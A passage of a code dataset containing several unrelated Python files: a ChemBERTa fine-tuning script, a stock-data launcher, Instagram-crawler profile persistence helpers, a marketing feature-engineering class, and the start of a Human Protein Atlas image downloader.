pretrained_model_dir: local or cloud dir\n dataset_name: name of dataset\n dataset_type: regression or classification\n run_dir: directory for saving results\n is_molnet: whether or not it's a MolNet dataset\n use_final: whether or not to use `final` directory. otherwise, uses the latest checkpoint\n \"\"\"\n torch.manual_seed(FLAGS.seed)\n os.environ[\"WANDB_DISABLED\"] = \"true\"\n\n tokenizer = RobertaTokenizerFast.from_pretrained(\n FLAGS.tokenizer_path, max_len=FLAGS.max_tokenizer_len, use_auth_token=True\n )\n\n finetune_datasets = get_finetune_datasets(dataset_name, tokenizer, is_molnet)\n\n if check_cloud(pretrained_model_dir):\n local_dir = os.path.join(\n tempfile.gettempdir(), os.sep.join(pretrained_model_dir.split(os.sep)[2:])\n )\n print(f\"Syncing {pretrained_model_dir} to {local_dir}\")\n sync_with_s3(pretrained_model_dir, local_dir)\n\n else:\n local_dir = pretrained_model_dir\n\n if use_final:\n checkpoint_dir = os.path.join(local_dir, \"final\")\n\n else:\n checkpoint_dir = get_latest_checkpoint(local_dir)\n other_checkpoint_dirs = [\n os.path.join(local_dir, x)\n for x in os.listdir(local_dir)\n if \"checkpoint\" in x\n ]\n other_checkpoint_dirs.remove(checkpoint_dir)\n for dir in other_checkpoint_dirs:\n shutil.rmtree(dir, ignore_errors=True)\n\n assert os.path.isdir(\n checkpoint_dir\n ), f\"Could not find checkpoint dir {checkpoint_dir}\"\n\n config = RobertaConfig.from_pretrained(\n checkpoint_dir,\n )\n\n if dataset_type == \"classification\":\n config.num_labels = finetune_datasets.num_labels\n\n elif dataset_type == \"regression\":\n config.num_labels = 1\n config.norm_mean = finetune_datasets.norm_mean\n config.norm_std = finetune_datasets.norm_std\n\n state_dict = prune_state_dict(checkpoint_dir)\n\n def warmup_model_init():\n if dataset_type == \"classification\":\n model_class = RobertaForSequenceClassification\n elif dataset_type == \"regression\":\n model_class = RobertaForRegression\n\n model = model_class.from_pretrained(\n checkpoint_dir,\n config=config,\n state_dict=state_dict,\n use_auth_token=True,\n )\n for name, param in model.base_model.named_parameters():\n param.requires_grad = False\n\n return model\n\n # train for 2 epochs to get the final layer warmed-up\n warmup_dir = os.path.join(run_dir, \"warmup/\")\n warmup_model_dir = os.path.join(warmup_dir, \"warmed_up\")\n warmup_training_args = TrainingArguments(\n evaluation_strategy=\"epoch\",\n num_train_epochs=2,\n output_dir=warmup_dir,\n overwrite_output_dir=FLAGS.overwrite_output_dir,\n per_device_eval_batch_size=FLAGS.per_device_eval_batch_size,\n logging_steps=FLAGS.logging_steps,\n load_best_model_at_end=True,\n report_to=None,\n )\n warmup_trainer = Trainer(\n model_init=warmup_model_init,\n args=warmup_training_args,\n train_dataset=finetune_datasets.train_dataset,\n eval_dataset=finetune_datasets.valid_dataset,\n callbacks=[\n EarlyStoppingCallback(early_stopping_patience=FLAGS.early_stopping_patience)\n ],\n )\n warmup_trainer.train()\n warmup_trainer.save_model(warmup_model_dir)\n\n def hp_model_init():\n if dataset_type == \"classification\":\n model_class = RobertaForSequenceClassification\n elif dataset_type == \"regression\":\n model_class = RobertaForRegression\n\n # make sure to leave out the `state_dict` argument\n # since we actually want to use the saved final layer weights\n model = model_class.from_pretrained(\n warmup_model_dir,\n config=config,\n use_auth_token=True,\n )\n # make sure everything is trainable\n for name, param in model.base_model.named_parameters():\n 
param.requires_grad = True\n\n return model\n\n hp_training_args = TrainingArguments(\n evaluation_strategy=\"epoch\",\n num_train_epochs=100,\n output_dir=run_dir,\n overwrite_output_dir=FLAGS.overwrite_output_dir,\n per_device_eval_batch_size=FLAGS.per_device_eval_batch_size,\n logging_steps=FLAGS.logging_steps,\n load_best_model_at_end=True,\n report_to=None,\n save_total_limit=FLAGS.save_total_limit,\n )\n\n hp_trainer = Trainer(\n model_init=hp_model_init,\n args=hp_training_args,\n train_dataset=finetune_datasets.train_dataset,\n eval_dataset=finetune_datasets.valid_dataset,\n callbacks=[\n EarlyStoppingCallback(early_stopping_patience=FLAGS.early_stopping_patience)\n ],\n )\n\n def custom_hp_space_optuna(trial):\n return {\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 1e-7, 1e-4, log=True),\n # \"num_train_epochs\": trial.suggest_int(\n # \"num_train_epochs\", 1, FLAGS.num_train_epochs_max\n # ),\n \"seed\": trial.suggest_int(\"seed\", 1, 40),\n \"per_device_train_batch_size\": trial.suggest_categorical(\n \"per_device_train_batch_size\", [FLAGS.per_device_train_batch_size]\n ),\n }\n\n best_trial = hp_trainer.hyperparameter_search(\n backend=\"optuna\",\n direction=\"minimize\",\n hp_space=custom_hp_space_optuna,\n n_trials=FLAGS.n_trials,\n )\n\n # Set parameters to the best ones from the hp search\n for n, v in best_trial.hyperparameters.items():\n setattr(hp_trainer.args, n, v)\n\n dir_valid = os.path.join(run_dir, \"results\", \"valid\")\n dir_test = os.path.join(run_dir, \"results\", \"test\")\n os.makedirs(dir_valid, exist_ok=True)\n os.makedirs(dir_test, exist_ok=True)\n\n metrics_valid = {}\n metrics_test = {}\n\n # Run with several seeds so we can see std\n for random_seed in range(FLAGS.n_seeds):\n setattr(hp_trainer.args, \"seed\", random_seed)\n setattr(hp_trainer.args, \"run_name\", f\"run_{random_seed}\")\n hp_trainer.train()\n metrics_valid[f\"seed_{random_seed}\"] = eval_model(\n hp_trainer,\n finetune_datasets.valid_dataset_unlabeled,\n dataset_name,\n dataset_type,\n dir_valid,\n random_seed,\n )\n metrics_test[f\"seed_{random_seed}\"] = eval_model(\n hp_trainer,\n finetune_datasets.test_dataset,\n dataset_name,\n dataset_type,\n dir_test,\n random_seed,\n )\n\n with open(os.path.join(dir_valid, \"metrics.json\"), \"w\") as f:\n json.dump(metrics_valid, f)\n with open(os.path.join(dir_test, \"metrics.json\"), \"w\") as f:\n json.dump(metrics_test, f)\n\n # Delete checkpoints/runs from hyperparameter search since they use a lot of disk\n for d in glob(os.path.join(run_dir, \"run-*\")):\n shutil.rmtree(d, ignore_errors=True)\n for d in glob(os.path.join(run_dir, \"checkpoint-*\")):\n shutil.rmtree(d, ignore_errors=True)\n shutil.rmtree(warmup_dir, ignore_errors=True)\n\n hp_trainer.save_state()\n hp_trainer.save_model(os.path.join(run_dir, \"final\"))\n\n\ndef eval_model(trainer, dataset, dataset_name, dataset_type, output_dir, random_seed):\n labels = dataset.labels\n predictions = trainer.predict(dataset)\n fig = plt.figure(dpi=144)\n\n if dataset_type == \"classification\":\n if len(np.unique(labels)) <= 2:\n y_pred = softmax(predictions.predictions, axis=1)[:, 1]\n metrics = {\n \"roc_auc_score\": roc_auc_score(y_true=labels, y_score=y_pred),\n \"average_precision_score\": average_precision_score(\n y_true=labels, y_score=y_pred\n ),\n }\n sns.histplot(x=y_pred, hue=labels)\n else:\n y_pred = np.argmax(predictions.predictions, axis=-1)\n metrics = {\"mcc\": matthews_corrcoef(labels, y_pred)}\n\n elif dataset_type == \"regression\":\n y_pred = 
predictions.predictions.flatten()\n metrics = {\n \"pearsonr\": pearsonr(y_pred, labels),\n \"rmse\": mean_squared_error(y_true=labels, y_pred=y_pred, squared=False),\n }\n sns.regplot(x=y_pred, y=labels)\n plt.xlabel(\"ChemBERTa predictions\")\n plt.ylabel(\"Ground truth\")\n else:\n raise ValueError(dataset_type)\n\n plt.title(f\"{dataset_name} {dataset_type} results\")\n plt.savefig(os.path.join(output_dir, f\"results_seed_{random_seed}.png\"))\n\n return metrics\n\n\ndef get_dataset_name(dataset_name_or_path):\n return os.path.splitext(os.path.basename(dataset_name_or_path))[0]\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"chemberta/finetune/finetune_multiple_with_freeze.py","file_name":"finetune_multiple_with_freeze.py","file_ext":"py","file_size_in_byte":16433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"296120811","text":"import easyquotation\nimport datetime\nimport json\nimport easyquant\nfrom easyquant import DefaultQuotationEngine, DefaultLogHandler, PushBaseEngine\nfrom custom.fixedmainengine import FixedMainEngine\nfrom custom.sinadataengine import SinaEngine\n#import pymongo\n#import redis\n# choose = input('1: \\n:')\nimport click\n\nbroker = None\n\nneed_data = '' #get_broker_need_data(broker)\n\nclass DataSinaEngine(SinaEngine):\n EventType = 'data-sina'\n PushInterval = 5\n config = \"stock_calc_list\"\n\n@click.command ()\n@click.option ('--log-name', default=\"SAME_NAME\", help = 'log-name')\n@click.option('--calc-name', default = \"calc-day-data\", help= 'calc-name[calc-day-data, calc-min-data,calc-day-index]')\ndef startWork(calc_name, log_name):\n # log_type_choose = '2' #input('Choose log mode: 1: print to screen 2: write to a file\\n: ')\n log_type = 'file'#'stdout' if log_type_choose == '1' else 'file'\n\n if log_name == 'SAME_NAME':\n log_filepath = 'logs/%s.txt' % calc_name\n else:\n log_filepath = 'logs/%s.txt' % log_name\n\n log_handler = DefaultLogHandler(name='calc-data', log_type=log_type, filepath=log_filepath)\n qe_list=[DataSinaEngine]\n m = easyquant.MainEngine(broker, need_data, quotation_engines=qe_list, log_handler=log_handler)\n # m = FixedMainEngine(broker, need_data, quotation_engines=qe_list, log_handler=log_handler)\n m.is_watch_strategy = False #True # auto-reload strategy files when they change; not recommended in production\n names=[calc_name]\n m.load_strategy(names=names)\n m.start()\n\nif __name__ == \"__main__\":\n startWork()\n","sub_path":"mycalc.py","file_name":"mycalc.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492891268","text":"from datetime import datetime\nfrom typing import List\n\nfrom peewee import fn\n\nfrom inscrawler.model.profile import Profile\nfrom inscrawler.persistence.data.following_data import create_or_update_following\nfrom inscrawler.persistence.entity.profile_entity import ProfileEntity\n\n\ndef create_or_update_profile(profile: Profile):\n profile_entity_on_db: ProfileEntity = ProfileEntity.get_or_create(username=profile.username)[0]\n\n now = int(datetime.now().timestamp())\n if profile_entity_on_db.created_at is None:\n profile.created_at = now\n else:\n profile.created_at = profile_entity_on_db.created_at\n\n profile.last_visit = now\n\n profile.id_ = profile_entity_on_db.id\n profile_entity: ProfileEntity = to_entity(profile)\n\n profile_entity.save()\n\n for follower in profile.followers:\n create_or_update_following(follower, profile)\n\n for follower in profile.followings:\n 
create_or_update_following(profile, follower)\n\n\ndef get_or_create_profile(username: str) -> Profile:\n profile_entity: ProfileEntity = ProfileEntity.get_or_create(username=username)[0]\n return from_entity(profile_entity)\n\n\n# Let A be a sorted list of profiles (by the last_visit column), draw a random number between 1 and the number of\n# elements of the profile table, and then select the n_profile elements below the nth + 1 record\ndef get_profile_to_crawl(n_profile: int) -> List[Profile]:\n profile_entity_list: List[ProfileEntity] = ProfileEntity.select().order_by(ProfileEntity.last_visit.asc()).limit(\n n_profile).offset(fn.FLOOR(fn.RANDOM() * ProfileEntity.select().count()) + 1)\n\n return [from_entity(profile) for profile in profile_entity_list]\n\n\ndef to_entity(profile: Profile) -> ProfileEntity:\n return ProfileEntity(id=profile.id_,\n username=profile.username,\n name=profile.name,\n description=profile.description,\n n_followers=profile.n_followers,\n n_following=profile.n_following,\n n_posts=profile.n_posts,\n photo_url=profile.photo_url,\n last_visit=profile.last_visit,\n created_at=profile.created_at,\n deleted=profile.deleted,\n visited=profile.visited)\n\n\ndef from_entity(profile_entity: ProfileEntity) -> Profile:\n return Profile(id_=profile_entity.id,\n username=profile_entity.username,\n name=profile_entity.name,\n description=profile_entity.description,\n n_followers=profile_entity.n_followers,\n n_following=profile_entity.n_following,\n n_posts=profile_entity.n_posts,\n photo_url=profile_entity.photo_url,\n last_visit=profile_entity.last_visit,\n created_at=profile_entity.created_at,\n deleted=profile_entity.deleted,\n visited=profile_entity.visited)\n","sub_path":"inscrawler/persistence/data/profile_data.py","file_name":"profile_data.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"161834676","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.decomposition import PCA\n\n\nclass FeatureEngineer:\n def __init__(self, training, unseen):\n self._rank = {}\n self.training = training\n self.unseen = unseen\n\n self._extract_business_features()\n self._merge_categories()\n self._generate_dummies()\n\n\n\n def _extract_business_features(self):\n \"\"\"\"\n Here we extract the new business-oriented features from the original features\n \"\"\"\n\n # Put all of the creation of new variables into a function so we can call it both for self.training and\n # for self.unseen instead of writing all this twice.\n def create_bus_feat(df):\n n = df.shape[0]\n\n # Percentage of Monetary Units spent on gold products out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = df[\"MntGoldProds\"].iloc[i] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :]) * 100\n\n df[\"PrpGoldProds\"] = aux\n\n # Number of Accepted Campaigns out of the last 5 Campaigns\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['AcceptedCmp3', 'AcceptedCmp4', 'AcceptedCmp5', 'AcceptedCmp1', 'AcceptedCmp2']].iloc[i, :])\n\n df[\"NmbAccCmps\"] = aux\n\n # Proportion of Accepted Campaigns out of the last 5 Campaigns\n aux = [0] * n\n\n for i in range(n):\n aux[i] = (sum(\n 
df[['AcceptedCmp3', 'AcceptedCmp4', 'AcceptedCmp5', 'AcceptedCmp1', 'AcceptedCmp2']].iloc[i,\n :]) / 5) * 100\n\n df[\"PrpAccCmps\"] = aux\n\n # Proportion of Monetary Units spent on Wine out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntWines\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpWines\"] = aux\n\n # Proportion of Monetary Units spent on Fruits out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntFruits\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpFruits\"] = aux\n\n # Proportion of Monetary Units spent on Meat out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntMeatProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpMeat\"] = aux\n\n # Proportion of Monetary Units spent on Fish out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntFishProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpFish\"] = aux\n\n # Proportion of Monetary Units spent on Sweets out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntSweetProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpSweets\"] = aux\n\n # Monetary\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i, :])\n\n df[\"Mnt\"] = aux\n\n # Buy Potential\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :]) / ((df[[\"Income\"]].iloc[i, :]) * 2))\n\n df[\"BuyPot\"] = aux\n\n # Frequency\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['NumDealsPurchases', 'NumWebPurchases', 'NumCatalogPurchases', 'NumStorePurchases']].iloc[i, :])\n\n df[\"Freq\"] = aux\n\n # Creating RFM feature using Recency, Freq and Mnt:\n feature_list, n_bins = [\"Recency\", \"Freq\", \"Mnt\"], 5\n rfb_dict = {}\n for feature in feature_list:\n bindisc = KBinsDiscretizer(n_bins=n_bins, encode='ordinal', strategy=\"quantile\")\n feature_bin = bindisc.fit_transform(df[feature].values[:, np.newaxis])\n feature_bin = pd.Series(feature_bin[:, 0], index=df.index)\n feature_bin += 1\n\n if feature == \"Recency\":\n feature_bin = feature_bin.sub(5).abs() + 1\n rfb_dict[feature + \"_bin\"] = feature_bin.astype(int).astype(str)\n\n df[\"RFM\"] = (rfb_dict['Recency_bin'] + rfb_dict['Freq_bin'] + rfb_dict['Mnt_bin']).astype(int)\n\n # Creating new feature using PCA to summarize all features in 2 dimensions (2 new features)\n columns = df.columns\n columns = columns.drop([\"Response\", \"Marital_Status\", \"Education\"])\n\n pca = PCA(n_components=2)\n principalComponents = pca.fit_transform(df[columns])\n\n df[\"pc1_\"] = principalComponents[:, 0]\n df[\"pc2_\"] = principalComponents[:, 1]\n\n # Creating new feature using PCA to summarize all features in 5 dimensions (5 new features)\n pca = PCA(n_components=5)\n principalComponents = pca.fit_transform(df[columns])\n\n df[\"pc1\"] = 
principalComponents[:, 0]\n df[\"pc2\"] = principalComponents[:, 1]\n df[\"pc3\"] = principalComponents[:, 2]\n df[\"pc4\"] = principalComponents[:, 3]\n df[\"pc5\"] = principalComponents[:, 4]\n\n\n\n\n create_bus_feat(self.training)\n create_bus_feat(self.unseen)\n\n\n\n def _merge_categories(self):\n \"\"\"\"\n We merge the categories Marital_Status and Education respecting the enconding previously done in data_loader\n It it as follows:\n Marital_Status: \"Single\" as 3, \"Widow\" as 2, \"Divorced\" as 1 and [\"Married\", \"Together\"] as 0\n Education: \"Phd\" as 2, \"Master\" as 1 and ['Graduation', 'Basic', '2n Cycle'] as 0\n\n The feature HasOffspring that works as a kind of merging of KidHome and TeenHome indicating presence\n of offsrping\n \"\"\"\n self.dict_merge_cat = {\"Marital_Status\": lambda x: 3 if x == 0 else (2 if x == 1 else (1 if x == 2 else 0)),\n \"Education\": lambda x: 2 if x == 4 else (1 if x == 3 else 0),\n \"NmbAccCmps\": lambda x: 1 if x > 0 else 0,\n \"Age_d\": lambda x: 3 if x == 0 else (2 if x == 1 else (1 if x == 2 else (4 if x == 4 else 0))),\n \"Income_d\": lambda x: 3 if x == 5 else (2 if x == 4 else (1 if x == 3 else 0))}\n\n # Applies the dictionary on both datasets\n for key, value in self.dict_merge_cat.items():\n self.training[\"MC_\"+key] = self.training[key].apply(value).astype('category')\n self.unseen[\"MC_\" + key] = self.unseen[key].apply(value).astype('category')\n\n\n # Function to apply both on traininf and unseen that creates the HasOffspring feature that\n # indicates presence of any children or teen\n def create_hasoffsrping(df):\n # HasOffsrping Feature\n aux = [0] * df.shape[0]\n\n for i in range(df.shape[0]):\n if (int(df[[\"Kidhome\"]].iloc[i, :]) + int(df[[\"Teenhome\"]].iloc[i, :]) > 0):\n aux[i] = 1\n else:\n aux[i] = 0\n\n df[\"HasOffspring\"] = aux\n df[\"HasOffspring\"] = df[\"HasOffspring\"].astype('category')\n\n # Applies the function create_hasoffspring on both datasets\n create_hasoffsrping(self.training)\n create_hasoffsrping(self.unseen)\n\n\n\n def _generate_dummies(self):\n \"\"\"\"\n Use OneHotEncoding to generate dummies for the merged Marital_Status and Education features\n \"\"\"\n features_to_enconde = ['MC_Marital_Status', 'MC_Education', 'MC_NmbAccCmps', 'MC_Age_d', 'MC_Income_d']\n columns = [\"DT_MS_Single\", \"DT_MS_Widow\", \"DT_MS_Divorced\", \"DT_E_Phd\", \"DT_E_Master\", \"DT_Acc_1\",\n \"DT_Age_4\", \"DT_Age_3\", \"DT_Age_2\", \"DT_Age_1\", \"DT_Income_3\", \"DT_Income_2\", \"DT_Income_1\"]\n idxs = [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] # 1(Single), 2(Widow), 3(Divorced), 4(MS_Zero), 5(Phd),\n # 6(Master), 7(Accepted at least 1 campaign) , 8(Educ_Zero)\n # encode categorical features from training data as a one-hot numeric array.\n enc = OneHotEncoder(handle_unknown='ignore')\n Xtr_enc = enc.fit_transform(self.training[features_to_enconde]).toarray()\n # update training data\n df_temp = pd.DataFrame(Xtr_enc[:, idxs], index=self.training.index, columns=columns)\n self.training = pd.concat([self.training, df_temp], axis=1)\n for c in columns:\n self.training[c] = self.training[c].astype('category')\n # use the same encoder to transform unseen data\n Xun_enc = enc.transform(self.unseen[features_to_enconde]).toarray()\n # update unseen data\n df_temp = pd.DataFrame(Xun_enc[:, idxs], index=self.unseen.index, columns=columns)\n self.unseen = pd.concat([self.unseen, df_temp], axis=1)\n for c in columns:\n self.unseen[c] = self.unseen[c].astype('category')\n\n\n\n def box_cox_transformations(self, 
num_features, target):\n \"\"\"\"\n Applies the box-cox transformations to the numerical features and checks which transformations are better\n for each feature and appends them to the training and unseen datasets\n \"\"\"\n\n # 1) perform feature scaling, using MinMaxScaler from sklearn\n bx_cx_scaler = MinMaxScaler(feature_range=(0, 1), copy=False)\n X_tr_01 = bx_cx_scaler.fit_transform(self.training[num_features].values)\n X_un_01 = bx_cx_scaler.transform(self.unseen[num_features].values)\n num_features_BxCx = [\"BxCxT_\" + s for s in num_features]\n self.training = pd.concat([self.training.loc[:, self.training.columns != target],\n pd.DataFrame(X_tr_01, index=self.training.index, columns=num_features_BxCx),\n self.training[target]], axis=1)\n self.unseen = pd.concat([self.unseen.loc[:, self.unseen.columns != target],\n pd.DataFrame(X_un_01, index=self.unseen.index, columns=num_features_BxCx),\n self.unseen[target]], axis=1)\n # 2) define a set of transformations\n self._bx_cx_trans_dict = {\"x\": lambda x: x, \"log\": np.log, \"sqrt\": np.sqrt,\n \"exp\": np.exp, \"**1/4\": lambda x: np.power(x, 0.25),\n \"**2\": lambda x: np.power(x, 2), \"**4\": lambda x: np.power(x, 4)}\n # 3) perform power transformations on scaled features and select the best\n self.best_bx_cx_dict = {}\n for feature in num_features_BxCx:\n best_test_value, best_trans_label, best_power_trans = 0, \"\", None\n for trans_key, trans_value in self._bx_cx_trans_dict.items():\n # 3) 1) 1) apply transformation on training data\n feature_trans = np.round(trans_value(self.training[feature]), 4)\n if trans_key == \"log\":\n feature_trans.loc[np.isfinite(feature_trans) == False] = -50\n # 3) 1) 2) bin transformed feature (required to perform Chi-Squared test)\n bindisc = KBinsDiscretizer(n_bins=10, encode=\"ordinal\", strategy=\"uniform\")\n feature_bin = bindisc.fit_transform(feature_trans.values.reshape(-1, 1))\n feature_bin = pd.Series(feature_bin[:, 0], index=self.training.index)\n # 3) 1) 3) obtain contingency table\n cont_tab = pd.crosstab(feature_bin, self.training[target], margins=False)\n # 3) 1) 4) compute Chi-Squared test\n chi_test_value = stats.chi2_contingency(cont_tab)[0]\n # 3) 1) 5) choose the best so far Box-Cox transformation based on Chi-Squared test\n if chi_test_value > best_test_value:\n best_test_value, best_trans_label, best_power_trans = chi_test_value, trans_key, feature_trans\n self.best_bx_cx_dict[feature] = (best_trans_label, best_power_trans)\n # 3) 2) append transformed feature to the data frame\n self.training[feature] = best_power_trans\n # 3) 3) apply the best Box-Cox transformation, determined on training data, on unseen data\n self.unseen[feature] = np.round(self._bx_cx_trans_dict[best_trans_label](self.unseen[feature]), 4)\n self.box_cox_features = num_features_BxCx\n\n\n\n def rank_features_chi_square(self, continuous_flist, categorical_flist):\n \"\"\"\"\n Method to rank all features according to chi-square test for independence in relation to Response.\n All based solely on the training set.\n \"\"\"\n chisq_dict = {}\n if continuous_flist:\n bindisc = KBinsDiscretizer(n_bins=10, encode='ordinal', strategy=\"uniform\")\n for feature in continuous_flist:\n feature_bin = bindisc.fit_transform(self.training[feature].values[:, np.newaxis])\n feature_bin = pd.Series(feature_bin[:, 0], index=self.training.index)\n cont_tab = pd.crosstab(feature_bin, self.training[\"Response\"], margins=False)\n chisq_dict[feature] = stats.chi2_contingency(cont_tab.values)[0:2]\n if categorical_flist:\n for 
feature in categorical_flist:\n cont_tab = pd.crosstab(self.training[feature], self.training[\"Response\"], margins=False)\n chisq_dict[feature] = stats.chi2_contingency(cont_tab.values)[0:2]\n\n df_chisq_rank = pd.DataFrame(chisq_dict, index=[\"Chi-Squared\", \"p-value\"]).transpose()\n df_chisq_rank.sort_values(\"Chi-Squared\", ascending=False, inplace=True)\n df_chisq_rank[\"valid\"] = df_chisq_rank[\"p-value\"] <= 0.05\n self._rank[\"chisq\"] = df_chisq_rank\n\n def calc_dta_feat_worth(self, feat_list, max_depth, min_samples_split, min_samples_leaf, seed):\n \"\"\"\"\n Method that receives a list of feature names, name of target and DecisionTreeClassifier paramethers and\n returns a df with all features with a worth higher than zero. All based solely on the training set.\n \"\"\"\n\n # Preparing the Input Data for the DTA\n X = self.training.loc[:, feat_list].values\n y = self.training[\"Response\"].values\n\n # Run the estimation through DecisionTreeClassifier\n dtree = DecisionTreeClassifier(criterion=\"entropy\", max_depth=max_depth, min_samples_split=min_samples_split,\n min_samples_leaf = min_samples_leaf, random_state=seed)\n # Fits the DTClassifier with our data\n dtree = dtree.fit(X, y)\n\n # Create a dictionary with the name of all features and its importance according to the DTA estimation\n fi = dict(zip(feat_list, dtree.feature_importances_))\n # Then creates a Dataframe with it\n fidf = pd.DataFrame(fi, index=[\"worth\"])\n # Transpose it because the way it is created it is on the other orientation\n fidf_t = fidf.transpose().sort_values(by=\"worth\", ascending=False)\n # Removes features with worth 0 and puts it into a df called worth_df\n worth_df = fidf_t[fidf_t.worth > 0]\n\n self._rank[\"dta\"] = worth_df\n\n def print_top(self, n=10):\n \"\"\"\"\n Prints the best n features (default n = 10)\n \"\"\"\n print(self._rank.index[0:n])\n\n def get_top(self, criteria, n_top):\n \"\"\"\"\n Returns the training and unseen datasets with only the best n_top features according to the criteria\n selected (chi_square or dta) (default n_top = 10).\n \"\"\"\n input_features = list(self._rank[criteria].index[0:n_top])\n input_features.append(\"Response\")\n return self.training[input_features], self.unseen[input_features]\n\n\n\n def _input_missing_values(self):\n \"\"\"\"\n Inputs any missing values of numerical features with its mean in order to deal with the weird missings.\n\n NOTE: we are doing this here due to missing values in the newly engineered features that could\n appear due to weird interaction between features, like dividing by zero or something of that nature.\n \"\"\"\n\n def input_missing(df):\n num_feat_list = df._get_numeric_data().drop([\"Response\", \"Education\", \"Marital_Status\"], axis=1).columns\n for feat in num_feat_list:\n if (df[feat].isna().sum() > 0):\n df[feat] = df[feat].fillna(df[feat].mean())\n\n return\n\n # We need to apply on training AND on unseen data, since the Box-Cox transformations were applied on both datsets.\n input_missing(self.training)\n input_missing(self.unseen)\n\n return","sub_path":"ml_bc_pipeline/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":18008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"267307945","text":"import glob\nimport os\nimport xml.etree.ElementTree as ET\nfrom multiprocessing.pool import Pool\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport requests\n\nPROTEINS = [\n 'nucleoplasm',\n 
'nuclear membrane',\n 'nucleoli',\n 'nucleoli fibrillar center',\n 'nuclear speckles',\n 'nuclear bodies',\n 'endoplasmic reticulum',\n 'golgi apparatus',\n 'peroxisomes',\n 'endosomes',\n 'lysosomes',\n 'intermediate filaments',\n 'actin filaments',\n 'focal adhesion sites',\n 'microtubules',\n 'microtubule ends',\n 'cytokinetic bridge',\n 'mitotic spindle',\n 'microtubule organizing center',\n 'centrosome',\n 'lipid droplets',\n 'plasma membrane',\n 'cell junctions',\n 'mitochondria',\n 'aggresome',\n 'cytosol',\n 'cytoplasmic bodies',\n 'rods & rings',\n # ---\n 'midbody',\n 'cleavage furrow',\n 'nucleus',\n 'vesicles',\n 'midbody ring'\n]\n\nIMAGE_URL_PREFIX = 'http://v18.proteinatlas.org/images/'\nIMAGE_URL_SUFFIX = '_blue_red_green.jpg'\n\nBASE_HPA_DIR = '/storage/kaggle/hpa'\nBASE_HPA_EXT_DIR = '/storage/kaggle/hpa_external'\n\n\ndef download_xml(gene_id):\n dst_file_path = '{}/xmls/{}.xml'.format(BASE_HPA_EXT_DIR, gene_id)\n if not os.path.isfile(dst_file_path):\n url = 'https://v18.proteinatlas.org/{}.xml'.format(gene_id)\n r = requests.get(url, allow_redirects=True)\n open(dst_file_path, 'wb').write(r.content)\n\n\ndef download_image(image_id):\n v18_url = 'http://v18.proteinatlas.org/images/'\n img = image_id.split('_')\n for color in ['red', 'green', 'blue', 'yellow']:\n img_path = img[0] + '/' + \"_\".join(img[1:]) + \"_\" + color + \".jpg\"\n img_name = image_id + \"_\" + color + \".jpg\"\n dst_file_path = '{}/images/{}'.format(BASE_HPA_EXT_DIR, img_name)\n if not os.path.isfile(dst_file_path):\n img_url = v18_url + img_path\n r = requests.get(img_url, allow_redirects=True)\n open(dst_file_path, 'wb').write(r.content)\n\n\ndef convert_to_png(src_file):\n basename = os.path.basename(src_file)\n dst_file = '{}/pngs/{}.png'.format(BASE_HPA_EXT_DIR, basename[:-4])\n if not os.path.isfile(dst_file):\n channel_name = src_file.split('_')[-1][:-4]\n image = load_image_channel(src_file, 512, channel_name)\n cv2.imwrite(dst_file, image)\n\n\ndef load_image_channel(file_path, image_size, channel_name):\n channel = cv2.imread(file_path)\n if channel is None:\n error_message = 'could not load image: \"{}\"'.format(file_path)\n print(error_message, flush=True)\n raise Exception(error_message)\n if channel.shape[0] != image_size:\n channel = cv2.resize(channel, (image_size, image_size), interpolation=cv2.INTER_AREA)\n\n if channel_name == 'red':\n channel = channel[:, :, 2]\n elif channel_name == 'green':\n channel = channel[:, :, 1]\n elif channel_name == 